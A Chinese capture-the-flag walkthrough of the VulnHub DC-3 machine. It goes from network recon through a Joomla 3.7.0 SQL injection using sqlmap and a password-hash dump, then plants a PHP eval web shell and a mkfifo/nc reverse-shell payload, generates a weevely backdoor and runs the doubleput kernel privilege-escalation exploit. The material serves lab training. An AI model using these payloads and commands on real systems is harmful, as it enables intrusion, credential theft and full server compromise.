vulnhub靶场DC-3

0x01  信息收集

DC-3靶机用Vmfusion启动提示需要将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”,windows版本可以直接从高级设置更改,mac版没有这个选项,换用Virtualbox虚拟.提示找不到物理网卡Realtek PCIe FE Family Controller,更改默认网络设置,桥接模式->内部网络,启动成功

首先还是查看攻击机ip,并找到目标机

也可以用netdiscover寻找

netdiscover -r 192.168.5.1/24 //查看子网192.168.5中所有主机

netdiscover是一个更快速,最简单的程序,它不会显示有关目标客户端的非常详细的信息

它只会向我们展示他们的IP地址,MAC地址,有时还会向我们展示硬件制造商

只开放了80端口,访问看看

  

是一个Joomla站

这次用Nikto扫目录

nikto -h 192.168.5.6

发现后台登录界面

 对网站进行指纹识别

whatweb 192.168.5.6

 用joomscan扫版本等信息

joomscan -u http://192.168.5.6

0x02  尝试攻击

kali搜索对应版本的漏洞

searchsploit joomla 3.7.0

有一个sql漏洞,保存漏洞信息并查看

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /joomla_sql.txt

 

使用注入点信息

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 

 查询当前数据库

--current-db

查当前数据库下的表

-D 'joomladb' --tables

 

 获取#__users中的列名

-D 'joomladb' -T '#__users' --columns

 查字段

-D 'joomladb' -T '#__users' -C 'name,password' --dump

 把加密的写入文件破解

john 1.txt

登录后台,收集信息

 找到可以执行代码的地方

 从外部可以访问的位置写入一句话木马,蚁剑连接

<?php @eval($_POST['a']);?>

建立反弹连接,这里使用两种方式

PHP代码反弹shell建立连接,kali监听1337端口,执行文件后没有成功(建立成功后利用py伪终端进一步操作)

nc -lvp 1337 //kali监听1337端口

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.6 1337 >/tmp/f');?>

 

 使用Weevely工具建立

生成服务端

weevely generate <password> <path>

weevely generate 123 shell.php //密码:123456 脚本文件名:shell.php

 

上传脚本

连接服务端,获得shell

weevely <URL> <password> [cmd] 

查看系统信息 

uname -a

 搜寻对应版本漏洞提权

 选一个合适的,放入/root目录下

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root

 

打开查看漏洞介绍,找到地址下载exp(下载失败/缓慢,换物理机下载),玩成后解压

unzip 39772.zip

 进入文件夹,解压脚本tar包,可以使用

tar-xvf exploit.tar //解压exploit提权脚本tar包

蚁剑上传39772.zip到/var/tmp目录下

 解压并执行脚本

./compile.sh //执行脚本,编译代码文件

./doubleput //执行提权文件

 

原文地址:https://www.cnblogs.com/-saber/p/14558971.html